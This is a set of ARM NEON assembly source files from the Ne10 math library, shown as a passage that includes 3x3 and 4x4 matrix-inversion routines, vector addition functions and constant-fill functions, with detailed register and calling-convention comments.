vmul.f32 q15, q15, q8
.endm
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ This macro stores two 3x3 matrices returned by the above macro
@ GET_INVERSE_3x3MATS from registers q10-q15 into the memory
@ address pointed to by register r0 (dst), advancing r0 past both
@ matrices (2 * 9 floats).  Clobbers q10-q15 (vtrn is in-place).
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro STORE_3x3INVMATS
@ rearrange the results for use in a "vst3" instruction...
vtrn.32 q10, q13
vtrn.32 q11, q14
vtrn.32 q12, q15
@ each matrix is stored as 8 interleaved floats plus a single-lane
@ vst3 for the 9th element
vst3.32 { d20 , d22 , d24 }, [r0]!
vst3.32 { d21[0], d23[0], d25[0]}, [r0]!
vst3.32 { d26 , d28 , d30 }, [r0]!
vst3.32 { d27[0], d29[0], d31[0]}, [r0]!
.endm
.align 4
.global ne10_invmat_3x3f_neon
.thumb
.thumb_func
ne10_invmat_3x3f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_invmat_3x3f(arm_mat3x3f_t * dst,
@                 arm_mat3x3f_t * src,
@                 unsigned int count)
@
@ Inverts count 3x3 float matrices from src[] into dst[], two at a
@ time; returns 0.
@
@  r0: *dst & current dst entry's address
@  r1: *src & current src entry's address
@  r2: int count & the number of items in the input array that can be
@                   processed in chunks of 4 vectors
@
@  r3: the number of items that are left to be processed at the end
@      of the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
vpush {q4, q5, q6, q7} @ d8-d15 are callee-saved under the AAPCS
adr r4, CONST_FLOAT_1Em12
vld1.32 {q6}, [r4] @ q6 = near-zero threshold, used by GET_INVERSE_3x3MATS
adr r4, CONST_FLOAT_ONE
vld1.32 {q7}, [r4] @ q7 = 1.0f in all lanes
and r3, r2, #3 @ r3 = count % 4;
sub r2, r2, r3 @ count = count - r3; This is what's left to be processed after this loop
cmp r2, #0
beq .L_check_mat3x3
@ We load two 3x3 matrices each time, inverse them using the
@ provided macro above, and store the two resulting matrices
@ back into the memory location pointed to by the first parameter dst (r0)
@ load the 1st set of values
LOAD_3x3MATS_ARGS d0, d1, d2, d3, d4, d5, d6, d7, d8, d9, d10, d11, q0, q1, q2, q3, q4, q5, r1
subs r2, r2, #2 @ 2 for this set
@ calculate values for the 1st set
GET_INVERSE_3x3MATS
ble .L_mainloopend_mat3x3
.L_mainloop_mat3x3:
@ store the result for the current set
STORE_3x3INVMATS
@ load the next set of values
LOAD_3x3MATS_ARGS d0, d1, d2, d3, d4, d5, d6, d7, d8, d9, d10, d11, q0, q1, q2, q3, q4, q5, r1
subs r2, r2, #2
@ calculate values for the next set
GET_INVERSE_3x3MATS
bgt .L_mainloop_mat3x3 @ loop if r2 > 0, if we have at least another 2 matrices to process
.L_mainloopend_mat3x3:
@ the last iteration for this call
@ store the result for the last set
STORE_3x3INVMATS
.L_check_mat3x3:
@ check if anything left to process at the end of the input array
cmp r3, #0
ble .L_return_mat3x3
.L_secondloop_mat3x3:
@ process the last few items one matrix at a time
@ load the next (e.g. 3rd) set of values
vld3.32 { d0, d2, d4 }, [r1]!
vld3.32 { d1[0], d3[0], d5[0] }, [r1]!
@ transpose into the lane layout GET_INVERSE_3x3MATS expects
vtrn.32 q0, q3
vtrn.32 q1, q4
vtrn.32 q2, q5
subs r3, r3, #1
@ calculate values for the last (e.g. 3rd) set
GET_INVERSE_3x3MATS
@ store the result for the last (e.g. 3rd) set (one matrix: 8+1 floats)
vtrn.32 q10, q13
vtrn.32 q11, q14
vtrn.32 q12, q15
vst3.32 { d20 , d22 , d24 }, [r0]!
vst3.32 { d21[0], d23[0], d25[0]}, [r0]!
bgt .L_secondloop_mat3x3
.L_return_mat3x3:
@ restore callee-saved NEON registers and return 0
vpop {q4, q5, q6, q7}
pop {r4}
mov r0, #0
bx lr
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ This macro calculates the inverse of two 4x4 matrices.
@ It reads in the matrices from registers q0-q7 (lane-transposed) and
@ returns its results in registers q8-q15.
@ Expects: r4 -> CONST_FLOAT_1Em12 and r5 -> CONST_FLOAT_ONE (both
@          set up by the caller); clobbers q0-q7 and q10/q11.
@ Stack:   vpush'es 32 bytes mid-macro and pops them all again before
@          .endm (16 bytes via {d16,d17}, 16 via {d0,d1}), so sp is
@          balanced across the macro.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro GET_INVERSE_4x4MATS
vld1.32 {q10}, [r4] @ q10 = near-zero threshold (1e-12)
vld1.32 {q11}, [r5] @ q11 = 1.0f in all lanes
@ get the determinants of these two matrices in d30 (one per lane)
GET_DETERMINANT_of_4x4MATS_ARGS d0, d2, d4, d6, d8, d10, d12, d14, d1, d3, d5, d7, d9, d11, d13, d15, d30, d28, d26, d31, d29, d27
@ compare them to find the ones that are too small and set those to 1.0f
vacge.f32 d24, d30, d20 @ dst = d24
vand.f32 d25, d24, d30 @ tmp = d25
vbic.s32 d24, d22, d24 @ NOTE: The instruction here must be of type S32, the type F32 only negates the sign bits
vorr.f32 d24, d24, d25 @ at this point all d24 lanes that are too small are set to one and the rest are the determinants
@ d30 = 1.0f / d24, via vrecpe plus one Newton-Raphson refinement step
vrecpe.f32 d30, d24
vrecps.f32 d24, d30, d24
vmul.f32 d30, d24, d30
vmov.f32 d31, d30 @ So q15 = { d30={1/det(M1), 1/det(M2)}, d31={1/det(M1), 1/det(M2)} }
@ get the cofactors (signed 3x3 minors); d20/d22 serve as scratch here
GET_DETERMINANT_of_3x3MATS_ARGS d0 , d4 , d6 , d8 , d12, d14, d1 , d5 , d7 , d18, d20, d22
GET_DETERMINANT_of_3x3MATS_ARGS d0 , d2 , d4 , d8 , d10, d12, d1 , d3 , d5 , d19, d20, d22
GET_DETERMINANT_of_3x3MATS_ARGS d10, d12, d14, d3 , d5 , d7 , d11, d13, d15, d16, d20, d22
GET_NEG_DET_3x3MATS_ARGS d8 , d12, d14, d1 , d5 , d7 , d9 , d13, d15, d24, d20, d22
GET_DETERMINANT_of_3x3MATS_ARGS d8 , d10, d14, d1 , d3 , d7 , d9 , d11, d15, d17, d20, d22
GET_NEG_DET_3x3MATS_ARGS d8 , d10, d12, d1 , d3 , d5 , d9 , d11, d13, d25, d20, d22
vpush {d16, d17, d18, d19} @ spill q8/q9 (cofactors computed so far) to free d16-d19 as scratch
GET_NEG_DET_3x3MATS_ARGS d2 , d4 , d6 , d3 , d5 , d7 , d11, d13, d15, d18, d16, d17
GET_DETERMINANT_of_3x3MATS_ARGS d0 , d4 , d6 , d1 , d5 , d7 , d9 , d13, d15, d26, d16, d17
GET_NEG_DET_3x3MATS_ARGS d0 , d2 , d6 , d1 , d3 , d7 , d9 , d11, d15, d19, d16, d17
GET_DETERMINANT_of_3x3MATS_ARGS d0 , d2 , d4 , d1 , d3 , d5 , d9 , d11, d13, d27, d16, d17
GET_DETERMINANT_of_3x3MATS_ARGS d2 , d4 , d6 , d10, d12, d14, d11, d13, d15, d20, d16, d17
GET_NEG_DET_3x3MATS_ARGS d0 , d4 , d6 , d8 , d12, d14, d9 , d13, d15, d28, d16, d17
GET_DETERMINANT_of_3x3MATS_ARGS d0 , d2 , d6 , d8 , d10, d14, d9 , d11, d15, d21, d16, d17
GET_NEG_DET_3x3MATS_ARGS d0 , d2 , d4 , d8 , d10, d12, d9 , d11, d13, d29, d16, d17
GET_NEG_DET_3x3MATS_ARGS d2 , d4 , d6 , d10, d12, d14, d3 , d5 , d7 , d22, d16, d17
@@ GET_DETERMINANT_of_3x3MATS_ARGS d0 , d4 , d6 , d8 , d12, d14, d1 , d5 , d7 , d30, d16, d17 @ This is moved to the top of this section as q15 must remain unchanged
GET_NEG_DET_3x3MATS_ARGS d0 , d2 , d6 , d8 , d10, d14, d1 , d3 , d7 , d23, d16, d17
@@ GET_DETERMINANT_of_3x3MATS_ARGS d0 , d2 , d4 , d8 , d10, d12, d1 , d3 , d5 , d31, d16, d17 @ This is moved to the top of this section as q15 must remain unchanged
vpop {d16, d17} @ restore q8; the saved copy of q9 stays on the stack for now
@ now multiply all the entries with q15 = { d30={1/det(M1), 1/det(M2)}, d31={1/det(M1), 1/det(M2)} }
vmul.f32 q11, q11, q15
vmul.f32 q10, q10, q15
vmul.f32 q9, q9, q15
vmul.f32 q8, q8, q15
vpop {d0, d1} @ pop the saved copy of q9 into q0 (the q0 input is dead by now)
vmul.f32 q12, q12, q15
vmul.f32 q13, q13, q15
vmul.f32 q14, q14, q15
vmul.f32 q15, q0, q15
.endm
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ This macro stores two 4x4 matrices returned by the above macro
@ GET_INVERSE_4x4MATS from registers q8-q15 into the memory
@ address pointed to by the register r0 (dst), advancing r0 past both
@ matrices (2 * 16 floats).  Clobbers q8-q15 (vtrn is in-place).
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro STORE_4x4INVMATS
@ rearrange the results for use in a "vst4" instruction...
vtrn.32 q8, q12
vtrn.32 q9, q13
vtrn.32 q10, q14
vtrn.32 q11, q15
vst4.32 { d16 , d18 , d20 , d22 }, [r0]!
vst4.32 { d17 , d19 , d21 , d23 }, [r0]!
vst4.32 { d24 , d26 , d28 , d30 }, [r0]!
vst4.32 { d25 , d27 , d29 , d31 }, [r0]!
.endm
.align 4
.global ne10_invmat_4x4f_neon
.thumb
.thumb_func
ne10_invmat_4x4f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_invmat_4x4f(arm_mat4x4f_t * dst,
@                 arm_mat4x4f_t * src,
@                 unsigned int count)
@
@ Inverts count 4x4 float matrices from src[] into dst[], two at a
@ time; returns 0.
@
@  r0: *dst & current dst entry's address
@  r1: *src & current src entry's address
@  r2: int count & the number of items in the input array that can be
@                   processed in chunks of 4 vectors
@
@  r3: the number of items that are left to be processed at the end of
@      the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5}
vpush {q4, q5, q6, q7} @ d8-d15 are callee-saved under the AAPCS
adr r4, CONST_FLOAT_1Em12 @ r4/r5 are read inside GET_INVERSE_4x4MATS
adr r5, CONST_FLOAT_ONE
and r3, r2, #3 @ r3 = count % 4;
sub r2, r2, r3 @ count = count - r3; This is what's left to be processed after this loop
cmp r2, #0
beq .L_check_mat4x4
@ We load two 4x4 matrices each time, inverse them using the
@ provided macro above, and store the two resulting matrices
@ back into the memory location pointed to by the first parameter dst (r0)
@ load the 1st set of values
LOAD_4x4MATS_ARGS d0, d1, d2, d3, d4, d5, d6, d7, d8, d9, d10, d11, d12, d13, d14, d15, q0, q1, q2, q3, q4, q5, q6, q7, r1
subs r2, r2, #2 @ two for the first set
@ calculate values for the 1st set
GET_INVERSE_4x4MATS
ble .L_mainloopend_mat4x4
.L_mainloop_mat4x4:
@ store the result for the 1st/next (e.g. 3rd) set
STORE_4x4INVMATS
@ load the next (e.g. 3rd) set of values
LOAD_4x4MATS_ARGS d0, d1, d2, d3, d4, d5, d6, d7, d8, d9, d10, d11, d12, d13, d14, d15, q0, q1, q2, q3, q4, q5, q6, q7, r1
subs r2, r2, #2
@ calculate values for the 2nd/next (e.g. 3rd) set
GET_INVERSE_4x4MATS
bgt .L_mainloop_mat4x4 @ loop if r2 > 0, if we have at least another 2 matrices to process
.L_mainloopend_mat4x4:
@ the last iteration for this call
@ store the result for the last set
STORE_4x4INVMATS
.L_check_mat4x4:
@ check if anything left to process at the end of the input array
cmp r3, #0
ble .L_return_mat4x4
.L_secondloop_mat4x4:
@ process the last few items one matrix at a time
vld4.32 { d0, d2, d4, d6 }, [r1]!
vld4.32 { d1, d3, d5, d7 }, [r1]!
@ transpose into the lane layout GET_INVERSE_4x4MATS expects
vtrn.32 q0, q4
vtrn.32 q1, q5
vtrn.32 q2, q6
vtrn.32 q3, q7
subs r3, r3, #1
@ calculate values
GET_INVERSE_4x4MATS
@ store the results (one matrix: 16 floats)
vtrn.32 q8, q12
vtrn.32 q9, q13
vtrn.32 q10, q14
vtrn.32 q11, q15
vst4.32 { d16 , d18 , d20 , d22 }, [r0]!
vst4.32 { d17 , d19 , d21 , d23 }, [r0]!
bgt .L_secondloop_mat4x4
.L_return_mat4x4:
@ restore callee-saved NEON registers and return 0
vpop {q4, q5, q6, q7}
pop {r4, r5}
mov r0, #0
bx lr
|
open-vela/external_Ne10 | 12,872 | modules/math/NE10_add.neon.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_add.neon.s
@
.text
.syntax unified
.include "NE10header.s"
.align 4
.global ne10_add_float_neon
.thumb
.thumb_func
ne10_add_float_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_add_float(arm_float_t * dst,
@                 arm_float_t * src1,
@                 arm_float_t * src2,
@                 unsigned int count)
@
@ dst[i] = src1[i] + src2[i] for i in [0, count); returns 0.
@
@  r0: *dst & current dst entry's address
@  r1: *src1 & current src1 entry's address
@  r2: *src2 & current src2 entry's address
@  r3: int count & the number of items that can be processed in
@                   chunks of 4 floats
@
@  r4: the number of residual items processed one at a time before
@      the main vector loop
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4; calculate the residual loop
asr r3, r3, #2 @ r3 = count >> 2; calculate the main loop
cbz r4, .L_check_mainloop_float
.L_residualloop_float:
@ process the residual items one float at a time
vld1.f32 d0[0], [r1]! @ Fill in d0[0]
vld1.f32 d1[0], [r2]! @ Fill in d1[0]
subs r4, r4, #1
vadd.f32 d0, d0, d1
vst1.32 {d0[0]}, [r0]!
bgt .L_residualloop_float
.L_check_mainloop_float:
cbz r3, .L_return_float
.L_mainloop_float:
@ NOTE: loads sit at the top of the loop (not pre-loaded for the next
@ iteration at the bottom) so the routine never reads past the end of
@ src1/src2; the previous software-pipelined form loaded 16 bytes
@ beyond both source arrays on its final iteration, which can fault
@ at a page boundary.
vld1.32 {q0}, [r1]!
vld1.32 {q1}, [r2]!
vadd.f32 q3, q0, q1 @ q3 = q0 + q1
vst1.32 {d6,d7}, [r0]!
subs r3, r3, #1
bgt .L_mainloop_float @ loop while 4-float chunks remain
.L_return_float:
@ return 0
pop {r4}
mov r0, #0
bx lr
.align 4
.global ne10_add_vec2f_neon
.thumb
.thumb_func
ne10_add_vec2f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_add_vec2f(arm_vec2f_t * dst,
@                 arm_vec2f_t * src1,
@                 arm_vec2f_t * src2,
@                 unsigned int count)
@
@ dst[i] = src1[i] + src2[i] (component-wise) for i in [0, count);
@ returns 0.
@
@  r0: *dst & current dst entry's address
@  r1: *src1 & current src1 entry's address
@  r2: *src2 & current src2 entry's address
@  r3: int count & the number of items that can be processed in
@                   chunks of 4 vectors
@
@  r4: the number of residual items processed one at a time before
@      the main vector loop
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4; calculate the residual loop
asr r3, r3, #2 @ r3 = count >> 2; calculate the main loop
cbz r4, .L_check_mainloop_vec2
.L_residualloop_vec2:
@ process the residual items one 2-float vector at a time
vld1.f32 d0, [r1]!
vld1.f32 d1, [r2]!
subs r4, r4, #1
vadd.f32 d0, d0, d1
vst1.32 {d0}, [r0]!
bgt .L_residualloop_vec2
.L_check_mainloop_vec2:
cbz r3, .L_return_vec2
.L_mainloop_vec2:
@ NOTE: loads sit at the top of the loop so the routine never reads
@ past the end of src1/src2; the previous software-pipelined form
@ loaded 32 bytes beyond both source arrays on its final iteration.
vld2.32 {q0-q1}, [r1]!
vld2.32 {q2-q3}, [r2]!
vadd.f32 q8, q0, q2
vadd.f32 q9, q1, q3
vst2.32 {d16,d17,d18,d19}, [r0]!
subs r3, r3, #1
bgt .L_mainloop_vec2 @ loop while 4-vector (8 float) chunks remain
.L_return_vec2:
@ return 0
pop {r4}
mov r0, #0
bx lr
.align 4
.global ne10_add_vec3f_neon
.thumb
.thumb_func
ne10_add_vec3f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_add_vec3f(arm_vec3f_t * dst,
@                 arm_vec3f_t * src1,
@                 arm_vec3f_t * src2,
@                 unsigned int count)
@
@ dst[i] = src1[i] + src2[i] (component-wise) for i in [0, count);
@ returns 0.
@
@  r0: *dst & current dst entry's address
@  r1: *src1 & current src1 entry's address
@  r2: *src2 & current src2 entry's address
@  r3: int count & the number of items that can be processed in
@                   chunks of 4 vectors
@
@  r4: the number of residual items processed one at a time before
@      the main vector loop
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4; calculate the residual loop
asr r3, r3, #2 @ r3 = count >> 2; calculate the main loop
cbz r4, .L_check_mainloop_vec3
.L_residualloop_vec3:
@ process the residual items one 3-float vector at a time
vld3.f32 {d0[0], d2[0], d4[0]}, [r1]! @ The values are loaded like so:
                                      @ q0 = { V1.x, -, -, - };
                                      @ q1 = { V1.y, -, -, - };
                                      @ q2 = { V1.z, -, -, - };
vld3.f32 {d1[0], d3[0], d5[0]}, [r2]! @ The values are loaded like so:
                                      @ q0 = { V1.x, -, V2.x, - };
                                      @ q1 = { V1.y, -, V2.y, - };
                                      @ q2 = { V1.z, -, V2.z, - };
subs r4, r4, #1
@ component-wise sums end up in lane 0 of d0/d2/d4
vadd.f32 d0, d0, d1
vadd.f32 d2, d2, d3
vadd.f32 d4, d4, d5
vst3.32 {d0[0], d2[0], d4[0]}, [r0]!
bgt .L_residualloop_vec3
.L_check_mainloop_vec3:
cbz r3, .L_return_vec3
.L_mainloop_vec3:
@ NOTE: loads sit at the top of the loop so the routine never reads
@ past the end of src1/src2; the previous software-pipelined form
@ loaded 48 bytes beyond both source arrays on its final iteration.
vld3.32 {d0, d2, d4}, [r1]!
vld3.32 {d1, d3, d5}, [r1]!
vld3.32 {d18, d20, d22}, [r2]!
vld3.32 {d19, d21, d23}, [r2]!
vadd.f32 q12, q0, q9
vadd.f32 q13, q1, q10
vadd.f32 q14, q2, q11
vst3.32 {d24, d26, d28}, [r0]!
vst3.32 {d25, d27, d29}, [r0]!
subs r3, r3, #1
bgt .L_mainloop_vec3 @ loop while 4-vector (12 float) chunks remain
.L_return_vec3:
@ return 0
pop {r4}
mov r0, #0
bx lr
.align 4
.global ne10_add_vec4f_neon
.thumb
.thumb_func
ne10_add_vec4f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_add_vec4f(arm_vec4f_t * dst,
@                 arm_vec4f_t * src1,
@                 arm_vec4f_t * src2,
@                 unsigned int count)
@
@ dst[i] = src1[i] + src2[i] (component-wise) for i in [0, count);
@ returns 0.
@
@  r0: *dst & current dst entry's address
@  r1: *src1 & current src1 entry's address
@  r2: *src2 & current src2 entry's address
@  r3: int count & the number of items that can be processed in
@                   chunks of 4 vectors
@
@  r4: the number of residual items processed one at a time before
@      the main vector loop
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4; calculate the residual loop
asr r3, r3, #2 @ r3 = count >> 2; calculate the main loop
cbz r4, .L_check_mainloop_vec4
.L_residualloop_vec4:
@ process the residual items one 4-float vector at a time
vld1.f32 {d0, d1}, [r1]! @ q0 = { V1.x, V1.y, V1.z, V1.w };
vld1.f32 {d2, d3}, [r2]! @ q1 = { V2.x, V2.y, V2.z, V2.w };
subs r4, r4, #1
vadd.f32 q0, q0, q1
vst1.32 {d0, d1}, [r0]!
bgt .L_residualloop_vec4
.L_check_mainloop_vec4:
cbz r3, .L_return_vec4
.L_mainloop_vec4:
@ NOTE: loads sit at the top of the loop so the routine never reads
@ past the end of src1/src2; the previous software-pipelined form
@ loaded 64 bytes beyond both source arrays on its final iteration.
vld4.32 {d0, d2, d4, d6}, [r1]!
vld4.32 {d1, d3, d5, d7}, [r1]!
vld4.32 {d16, d18, d20, d22}, [r2]!
vld4.32 {d17, d19, d21, d23}, [r2]!
vadd.f32 q12, q0, q8
vadd.f32 q13, q1, q9
vadd.f32 q14, q2, q10
vadd.f32 q15, q3, q11
vst4.32 {d24, d26, d28, d30}, [r0]!
vst4.32 {d25, d27, d29, d31}, [r0]!
subs r3, r3, #1
bgt .L_mainloop_vec4 @ loop while 4-vector (16 float) chunks remain
.L_return_vec4:
@ return 0
pop {r4}
mov r0, #0
bx lr
|
open-vela/external_Ne10 | 6,327 | modules/math/NE10_setc.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_setc.asm.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_setc_float_asm
.thumb
.thumb_func
ne10_setc_float_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_setc_float(arm_float_t * dst,
@                 const arm_float_t cst,
@                 unsigned int count)
@
@ Fills dst[0..count) with the constant cst; returns NE10_OK.
@
@  r0: *dst       (advanced as each word is written)
@  r1: cst        (raw float bits, stored directly - no VFP needed)
@  r2: int count  (doubles as the loop counter)
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
cmp r2, #0 @ nothing to do for count == 0
beq .LSetcFloatDone
.LSetcFloatNext:
str r1, [r0], #4 @ dst[i] = cst; post-increment dst
subs r2, r2, #1 @ one fewer item remaining
bne .LSetcFloatNext
.LSetcFloatDone:
mov r0, NE10_OK @ Return NE10_OK
bx lr
.balign 4
.global ne10_setc_vec2f_asm
.thumb
.thumb_func
ne10_setc_vec2f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_setc_vec2f(arm_vec2f_t * dst,
@                 const arm_vec2f_t * cst,
@                 unsigned int count)
@
@ Fills dst[0..count) with the constant 2-float vector *cst; returns
@ NE10_OK.
@
@  r0: *dst       (advanced as each vector is written)
@  r1: *cst
@  r2: int count  (doubles as the loop counter)
@
@  r4/r5: cst->x / cst->y, fetched once before the loop
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5}
cmp r2, #0 @ nothing to do for count == 0
beq .LSetcVec2Done
ldr r4, [r1, #0] @ r4 = cst->x
ldr r5, [r1, #4] @ r5 = cst->y
.LSetcVec2Next:
subs r2, r2, #1 @ one fewer item remaining (str leaves flags intact)
str r4, [r0], #4 @ dst[i].x = cst->x
str r5, [r0], #4 @ dst[i].y = cst->y
bne .LSetcVec2Next
.LSetcVec2Done:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5}
bx lr
.balign 4
        .global  ne10_setc_vec3f_asm
        .thumb
        .thumb_func
ne10_setc_vec3f_asm:
        @-------------------------------------------------------------------
        @ arm_result_t ne10_setc_vec3f(arm_vec3f_t *dst,
        @                              const arm_vec3f_t *cst,
        @                              unsigned int count)
        @
        @ Copies the 3-component constant vector *cst into dst[0..count-1].
        @
        @ In:       r0 = dst, r1 = cst, r2 = count
        @ Out:      r0 = NE10_OK
        @ Clobbers: r2, flags; r4-r6 are saved and restored
        @-------------------------------------------------------------------
        push    {r4, r5, r6}            @ callee-saved scratch for cst->x/y/z
        cbz     r2, .LSetcVec3Done      @ count == 0: store nothing
        ldr     r4, [r1]                @ r4 = cst->x
        ldr     r5, [r1, #4]            @ r5 = cst->y
        ldr     r6, [r1, #8]            @ r6 = cst->z
.LSetcVec3Loop:
        subs    r2, r2, #1              @ one destination vector left to fill
        str     r4, [r0], #4            @ dst->x = cst->x
        str     r5, [r0], #4            @ dst->y = cst->y
        str     r6, [r0], #4            @ dst->z = cst->z; dst++
        bne     .LSetcVec3Loop
.LSetcVec3Done:
        mov     r0, NE10_OK             @ success status back to the caller
        pop     {r4, r5, r6}
        bx      lr
.balign 4
        .global  ne10_setc_vec4f_asm
        .thumb
        .thumb_func
ne10_setc_vec4f_asm:
        @-------------------------------------------------------------------
        @ arm_result_t ne10_setc_vec4f(arm_vec4f_t *dst,
        @                              const arm_vec4f_t *cst,
        @                              unsigned int count)
        @
        @ Copies the 4-component constant vector *cst into dst[0..count-1].
        @
        @ In:       r0 = dst, r1 = cst, r2 = count
        @ Out:      r0 = NE10_OK
        @ Clobbers: r2, flags; r4-r7 are saved and restored
        @-------------------------------------------------------------------
        push    {r4, r5, r6, r7}        @ callee-saved scratch for cst->x/y/z/w
        cbz     r2, .LSetcVec4Done      @ count == 0: store nothing
        ldr     r4, [r1]                @ r4 = cst->x
        ldr     r5, [r1, #4]            @ r5 = cst->y
        ldr     r6, [r1, #8]            @ r6 = cst->z
        ldr     r7, [r1, #12]           @ r7 = cst->w
.LSetcVec4Loop:
        subs    r2, r2, #1              @ one destination vector left to fill
        str     r4, [r0], #4            @ dst->x = cst->x
        str     r5, [r0], #4            @ dst->y = cst->y
        str     r6, [r0], #4            @ dst->z = cst->z
        str     r7, [r0], #4            @ dst->w = cst->w; dst++
        bne     .LSetcVec4Loop
.LSetcVec4Done:
        mov     r0, NE10_OK             @ success status back to the caller
